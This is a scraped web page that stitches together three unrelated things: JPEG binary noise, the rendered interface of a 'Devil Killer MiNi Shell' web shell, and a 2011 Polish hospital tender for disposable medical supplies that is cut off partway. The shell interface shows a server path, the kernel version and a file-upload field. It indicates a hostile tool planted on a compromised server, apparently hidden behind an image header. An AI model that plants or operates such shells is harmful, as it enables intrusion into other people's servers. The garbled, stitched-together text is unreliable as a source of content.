JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110208/45065-N-2011.html

<p class="kh_header"><b>Toruń: Dostawa sprzętu jednorazowego użytku.</b><br>
<b>Numer ogłoszenia: 45065 - 2011; data zamieszczenia: 08.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego użytku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu jednorazowego użytku z podziałem na 15 zadań, tj.:<br>
Zadanie Nr 1:<br>
1 Okulary jednorazowe ochronne do fototerapii, wykonane z ultramiękkiego materiału, dla obwodu głowy 20-38cm, mikrobiologicznie czyste - 250 szt.<br>
2 Czujnik jednorazowy, sterylny, nie zawierający lateksu, dla niemowląt od 3kg do 20kg, w kształcie litery L. Sensor w technologii OxiMax, kalibrowany cyfrowo i analogowo - 550 szt.<br>
3 Czujnik jednorazowy, sterylny, nie zawierający lateksu, dla noworodków poniżej 3kg lub dla dorosłych powyżej 40kg, w kształcie litery L. Sensor w technologii OxiMax, kalibrowany cyfrowo i analogowo, rejestrujący historię zdarzeń - 650 szt.<br>
4 Czujnik saturacji SpO2 jednorazowy, klejony, dla noworodków poniżej 3kg, mikrobiologicznie czysty - 500 szt.<br>
5 Czujnik saturacji SpO2 jednorazowy, klejony, neonatologiczny, mikrobiologicznie czysty kompatybilny z pulsoksymetrem typu DN-2261-6 Novametrix - 200 szt.<br>
6 Jednorazowy układ oddechowy do nCPAP z podgrzewanym ramieniem wdechowym, z workiem oddechowym i złączką typu Y, mikrobiologicznie czysty, wraz z jednorazowym zestawem do samoczynnego napełnienia komory nawilżacza
kompatybilny z nawilżaczem Fisher & Paykel - 25 kpl.<br>
7 Dren tlenowy ze złączem standardowym, długość ok. 1,8m - 250 szt.<br>
8 Łącznik do drenów i ssaków, mikrobiologicznie czysty - 300 szt.<br>
Zadanie Nr 2:<br>
1 Wielokomorowy zestaw do drenażu opłucnej, z mechaniczną regulacją siły ssania - 23 szt.<br>
Zadanie Nr 3:<br>
1 Aparat do przetoczeń płynów infuzyjnych kompatybilny z pompą infuzyjną INFUSOMAT SPACE standard - 850 szt.<br>
2 Aparat do przetoczeń krwi i preparatów krwiopochodnych, z filtrem do krwi 200?m kompatybilny z pompą infuzyjną INFUSOMAT FMS transfusion - 300 szt.<br>
Zadanie Nr 4:<br>
1 Filtr oddechowy dla dorosłych, sterylny, filtracja mechaniczna bakteryjno- wirusowa, filtr klasy HEPA13, objętość przestrzeni martwej około 80ml, złącze proste - 1600 szt.<br>
2 Filtr oddechowy pediatryczny, sterylny, filtracja mechaniczna lub elektrostatyczna bakteryjno-wirusowa, filtr klasy HEPA13, objętość przestrzeni martwej w zakresie 20-35ml, złącze proste - 2150 szt.<br>
3 Filtr oddechowy noworodkowy, sterylny, filtracja mechaniczna lub elektrostatyczna, objętość przestrzeni martwej około 10ml, złącze kolankowe -1000 szt.<br>
4 Wymiennik ciepła i wilgoci, sterylny, do rurek tracheotomijnych z portem tlenowym z nawilżaniem dopływającego tlenu, z samodomykającym się portem do odsysania pomiędzy dwiema membranami wymiennika, objętość przestrzeni martwej około 10ml, skuteczność nawilżania 29,2mg H2O przy Vt 500ml, waga 6,3g - 400 szt.<br>
Zadanie Nr 5:<br>
1 Filtr oddechowy do długiej wentylacji, sterylny, z wyraźnie wydzielonym celulozowym wymiennikiem ciepła i wilgoci, z hydrofobową, mechaniczną warstwą filtrującą w kształcie harmonijki, wydajność nawilżenia min. 32 mg/litr przy Vt 500ml, objętość martwa do 66ml, skuteczność filtracji 99,999%, waga filtra do 36 gram, powierzchnia filtracji 190cm, utrata wilgoci 6mg H2O/l przy objętości oddechowej 500ml	 - 500 szt.<br>
2 Filtr oddechowy dla dzieci do długiej wentylacji, sterylny, z wyraźnie wydzielonym celulozowym wymiennikiem ciepła i wilgoci, elektrostatyczna warstwa filtrująca, wydajność nawilżenia min. 31mg/litr przy Vt 250ml, objętość martwa do 29ml, skuteczność filtracji 99,99%, waga filtra do 21 gram, zakres pojemności oddechowej 75-300ml, port kapno - 500 szt.<br>
3 Filtr oddechowy dla dorosłych, do długiej wentylacji, sterylny, z wyraźnie wydzielonym celulozowym wymiennikiem ciepła i wilgoci, elektrostatyczna warstwa filtrująca, wydajność nawilżenia min. 33mg/litr przy Vt 500ml, opory przepływu 2,7cm H2O przy 60l/min, objętość martwa do 51ml, skuteczność filtracji 99,999%, waga filtra do 28 gram, zakres pojemności oddechowej 150-1200ml, port kapno - 500 szt.<br>
Zadanie Nr 6:<br>
1 Wkłucie centralne jednoświatłowe<br>
Rozmiar:<br>
24G x 100-120mm - 20 szt.<br>
22G x 100mm - 20 szt.<br>
20G x 100-120mm - 20 szt.<br>
2 Wkłucie centralne dwuświatłowe<br>
Rozmiar:<br>
3,0F x 80-120mm - 20 szt.<br>
4,0F x 100mm - 20 szt.<br>
4,0F x 130mm - 20 szt.<br>
5,0F x 80mm - 20 szt.<br>
5,0F x 130mm - 20 szt.<br>
5,5F x 160mm - 20 szt.<br>
7,0F x 200mm - 20 szt.<br>
3Wkłucie centralne trójświatłowe<br>
Rozmiar:<br>
4,0F x 130mm - 20 szt.<br>
5,5F x 160mm - 20 szt.<br>
7,0F x 160mm - 20 szt.<br>
4 Zamek do wkłuć centralnych, zamykające światło odprowadzeń cewnika centralnego - 500 szt.<br>
Zadanie Nr 7:<br>
1 Igła do znieczuleń podpajęczynówkowych z końcówką pencil-point, z prowadnicą, z przezroczystą końcówką typu lock, kolorowe oznaczenie rozmiaru mandrynu<br>
Rozmiar:<br>
25G x 90mm - 500 szt.<br>
26G x 90mm - 500 szt.<br>
27G x 90mm - 500 szt.<br>
25G x 110mm - 50 szt.<br>
2 Igła do znieczuleń zewnątrzoponowych typu TOUCHY, z mandrynem, z przezroczystą końcówką typu lock, kolorowe oznaczenie rozmiaru mandrynu<br>
Rozmiar:<br>
18G x 110mm - 50 szt.<br>
20G x 80mm - 50 szt.<br>
3 Igła do znieczuleń splotów nerwowych, z drenem do podawania leków, z połączeniem elektrycznym do stymulatora<br>
Rozmiar:<br>
22G x 50mm - 50 szt.<br>
24G x 25mm - 50 szt.<br>
Zadanie Nr 8:<br>
1 Miękki rozwidlacz trójkanałowy. Każdy kanał o dł. 10cm, śr. zewn. 2,5mm, wewn. 1,5mm, samoopróżniający się, z zaciskiem, zakończony zamkniętym systemem bezigłowym z łatwą do dezynfekcji membraną (bez silikonu) zamykającą się w sposób automatyczny na 7 dni i min. 360 użyć - 1200 szt.<br>
2 Kranik trójdrożny neonatologiczny, ze zmiennym oznaczeniem kolorystycznym (czerwono- niebieskim), z systemem antyzapiekowym na jednym odprowadzeniu, z możliwością obrotu o 360°, bezpieczny dla neonatologii -1800 szt.<br>
Zadanie Nr 9:<br>
1 Rurka intubacyjna z mankietem niskociśnieniowym, z PCV, z otworem Murphyego, z balonikiem kontrolnym w kolorze różnym od transparentnego przewodu łączącego z rurką<br>
Rozmiar: od 3,0 do 9,0 - 1400 szt.<br>
2 Rurka intubacyjna bez mankietu, z PCV, z otworem Murphyego<br>
Rozmiar: od 3,0 do 9,0 - 950	szt.<br>
3 Rurka intubacyjna zbrojona z mankietem uszczelniającym<br>
Rozmiar: od 5,0 do 8,0 - 300 szt.<br>
4 Rurka intubacyjna zbrojona bez mankietu<br>
Rozmiar: od 4,0 do 8,0 - 300 szt.<br>
5 Prowadnica do rurek intubacyjnych<br>
Rozmiar: od 10,0 do 12,0 - 500 szt.<br>
6 Rurka intubacyjna dwukanałowa, bez balonu, do podawania surfaktantu lub monitorowania ciśnienia w drogach oddechowych, przezroczysta, z kontrastującym w rtg paskiem, z 25mm końcówką dystalną kontrastującą w rtg, oznakowanie długości co 0,5cm<br>
Rozmiar: od 2,0 do 5,0 - 90 szt.<br>
7 Rurka ustno-gardłowa Guedela, kodowana kolorystycznie, sterylna - 500 szt.<br>
Rozmiar:<br> 
00/40mm<br>
0/50 mm<br>
1/60 mm<br>		
8 Rurka tracheotomijna z mankietem uszczelniającym<br>
Rozmiar: od 2,5 do 9,0 - 150 szt.<br>
9 Rurka tracheotomijna bez mankietu<br>
Rozmiar: od 2,5 do 9,0 - 100 szt.<br>
Zadanie Nr 10:<br>
1 Cewnik centralny zakładany metodą Seldingera, kontrastujący w rtg, poliuretanowy, z integralnym drenem przedłużającym, z zestawem wprowadzającym (prosta prowadnica, igła wprowadzająca)<br>
Rozmiar: 2Fr x 80 mm - 100 szt.<br>
2 Cewnik centralny zakładany metodą Seldingera, kontrastujący w rtg, poliuretanowy, z integralnym mocowaniem, z zestawem wprowadzającym (prosta prowadnica, igła wprowadzająca) -10 szt.<br>
Rozmiar:<br> 
3 Fr x 80 mm<br>
3 Fr x 120 mm<br>		
3 Cewnik pępkowy, dwukanałowy, poliuretanow - 120 szt.<br>
Rozmiar:<br> 
4 Fr x 200 mm<br>
(2 x 20G)<br>
Zadanie Nr 11:<br>
1 Jednorazowy układ drenów do respiratora, noworodkowy, podgrzewany, posiadający system uniwersalnych łączników umożliwiających zastosowanie we wszystkich typach respiratorów kompatybilny z nawilżaczami Fisher & Paykel - 120 szt.<br>
2 Jednorazowa komora do nawilżacza kompatybilna z nawilżaczami Fisher & Paykel - 120 szt.<br>
Zadanie Nr 12:<br>
1 Port bezigłowy do bezpiecznego dożylnego podawania płynów i leków, możliwość stosowania przez 7 dni, bez mechanicznych części wewnętrznych, posiadający prosty i widoczny tor przepływu, z zastawką w postaci jednoelementowej, silikonowej, podzielnej membrany, osadzonej na plastikowym, przezroczystym konektorze, o min. przepływie 525ml/min, zgodnym z wymaganiami normy PN-EN ISO 10555-5 - 800 szt.<br>
Zadanie Nr 13:<br>
1 Czujnik temperatury do inkubatorów Babytherm - 100 szt.<br>
Zadanie Nr 14:<br>
1 Zestaw do szynowania moczowodów z cewnikiem typu double-j wykonanym z poliuretanu, do stosowania do 3 miesięcy, skalowany co 1cm. Popychacz prosty ok. 45cm, prowadnica ok. 100cm pokryta PTFE, klamra, cewnik zamknięty od strony nerki, perforowany na całej długości. Długości do wyboru: 12cm, 15cm, 18cm, 20cm, 22cm, 24cm, 28cm.<br> 
Rozmiar:<br>
4CH - 5 szt.<br>
4,7CH - 5 szt.<br>
2 Zestaw do szynowania moczowodów, z cewnikiem typu double-j, do stosowania do 6 miesięcy, z popychaczem łączącym się z cewnikiem i dającym możliwość manewru nawet po wyjęciu prowadnicy. Cewnik zamknięty od strony nerkowej. Długości do wyboru: 15cm, 20cm, 22cm, 24cm, 26cm, 30cm.<br>
Rozmiar:<br>
4CH - 25 szt.<br>
4,8CH - 25 szt.<br>
Zadanie Nr 15:<br>
1 Zestaw do nefrostomii 2-stopniowej, z cewnikiem pokrytym hydrożelem, z twardą prowadnicą typu Lunderquist i igłą widoczną w USG i RTG, z poprzecznymi rowkami do przyszycia<br>
Rozmiar:<br>
6CH - 5 szt.<br>
8CH - 5 szt.<br>
10CH - 5 szt.<br>
2 Zestaw do nefrostomii 1-stopniowej (jednego nakłucia) z cewnikiem skalowanym co 1cm, z silikonowym elementem do mocowania do skóry pacjenta. Cewnik na igle<br>
Rozmiar:<br>
8CH - 5 szt.<br>
10CH - 5 szt.<br>
3 Zestaw do cystostomii cystofix. W zestawie: rozrywalna igła 120mm lub 80mm, skalpel, plaster, cewnik typu pigtail, w zestawach dziecięcych bezpieczna igła o długości 70mm - 30 szt.<br> 
Rozmiar:<br>
5CH<br>
8CH<br>
10CH<br>
12CH.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.20-8, 33.14.13.21-6, 33.14.12.00-2, 33.14.16.40-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku posiadania uprawnień do wykonywania określonej działalności lub czynności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku posiadania wiedzy i doświadczenia Wykonawca zobowiązany jest załączyć do oferty:<br>
a/ wykaz wykonanych min. 2 dostaw materiałów medycznych o wartości min. dla poszczególnych zadań:<br>
- Zadanie Nr 1 -  54.800,00 zł,<br>
- Zadanie Nr 2 -    1.480,00 zł,<br>
- Zadanie Nr 3 -    6.680,00 zł,<br>
- Zadanie Nr 4 -    8.400,00 zł,<br>
- Zadanie Nr 5 -    5.640,00 zł,<br>
- Zadanie Nr 6 -  14.200,00 zł,<br>
- Zadanie Nr 7 -  17.440,00 zł,<br>
- Zadanie Nr 8 -    3.120,00 zł,<br>
- Zadanie Nr 9 -  26.240,00 zł,<br>
- Zadanie Nr 10 -  9.080,00 zł,<br>
- Zadanie Nr 11 -  8.200,00 zł,<br>
- Zadanie Nr 12 -  1.120,00 zł,<br>
- Zadanie Nr 13   16.400,00 zł,<br>
- Zadanie Nr 14 -  3.000,00 zł,<br>
- Zadanie Nr 15 -  4.600,00 zł
brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;<br>
Wykonawca składający ofertę np. na Zadanie Nr 1 i Nr 2 musi wykazać się zrealizowanymi 2 dostawami o wymaganej wartości łącznej równej sumie tych zadań, tj. 56.280,00 zł każda dostawa.<br>
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej Wykonawca zobowiązany jest załączyć do oferty:<br>
a/ informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:<br>
- Zadanie Nr 1 -  35.000,00 zł,<br>
- Zadanie Nr 2 -    1.000,00 zł,<br>
- Zadanie Nr 3 -    4.200,00 zł,<br>
- Zadanie Nr 4 -    5.250,00 zł,<br>
- Zadanie Nr 5 -    3.500,00 zł,<br>
- Zadanie Nr 6 -    8.900,00 zł,<br>
- Zadanie Nr 7 -  11.000,00 zł,<br>
- Zadanie Nr 8 -    2.000,00 zł,<br>
- Zadanie Nr 9 -  16.400,00 zł,<br>
- Zadanie Nr 10 -  5.700,00 zł,<br>
- Zadanie Nr 11 -  5.200,00 zł,<br>
- Zadanie Nr 12 -     700,00 zł,<br>
- Zadanie Nr 13 -10.300,00 zł,<br>
- Zadanie Nr 14 -  1.900,00 zł,<br>
- Zadanie Nr 15 -  2.900,00 zł<br>
wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br>
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.<br>
Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.<br>
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br>
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego należy do oferty załączyć:<br> 
